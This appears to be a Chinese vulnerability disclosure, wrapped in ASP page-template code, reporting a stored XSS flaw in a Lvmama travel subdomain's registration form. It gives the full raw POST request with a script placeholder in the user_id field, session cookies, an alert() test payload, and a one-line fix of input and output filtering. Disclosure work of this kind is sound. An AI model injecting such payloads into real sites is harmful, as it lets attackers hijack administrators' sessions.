% dim ModuleName,InfoID,ChannelShortName,CorrelativeArticle,InstallDir,ChannelDir,Keyword,PageTitle,ArticleIntro,Articlecontent Keyword=stripHTML("驴妈妈,旅游网某,分站,XSS,漏洞") PageTitle=stripHTML("驴妈妈旅游网某分站XSS漏洞") ArticleIntro=stripHTML("XSS漏洞网页或者寻找非目标机以外的有跨站漏洞的网页。") Articlecontent=stripHTML(" url: http://fenxiao.lvmama.com/reg.jsp POST /reg.jsp HTTP/…") ModuleName = stripHTML("exploits") InfoID = stripHTML("215855") ChannelShortName=stripHTML("漏洞") InstallDir=stripHTML("http://www.77169.com/") ChannelDir=stripHTML("exploits") %>
导读 | <% if len(ArticleIntro)<3 then Response.Write Articlecontent 'Response.Write "Articlecontent" else Response.Write ArticleIntro 'Response.Write "ArticleIntro" end if %> |
url: http://fenxiao.lvmama.com/reg.jsp POST /reg.jsp HTTP/1.1 Host: fenxiao.lvmama.com Proxy-Connection: keep-alive Content-Length: 282 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://fenxiao.lvmama.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36 Content-Type: application/x-www-form-urlencoded Referer: http://fenxiao.lvmama.com/reg.jsp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8 Cookie: lvsessionid=311e0531-0b05-4e91-ad08-21e612e27a52_14439380; JSESSIONID=eG-zsmskW8Vh; startadd=10011 user_id=[xsscode]&password=123456&repassword=123456&cust_name=das&link_name=dsadas&link_phone=&link_mobile=13174189632&link_qq=dsad&link_fax=d&link_email=&provid=10011&cityid=&area_id=10011&link_address=&sale_channel=0&source_url=http%3A%2F%2Ffenxiao.lvmama.com%2F&cust_desc=&sale_type=1 对输入的信息没有做任何过滤,只要等待管理员审核就可以触发就可以了。 alert('hello,world.') |
分销商后台管理:
拒绝合作分销商:
合作中分销商:
修复方案:
输入过滤 和 输出过滤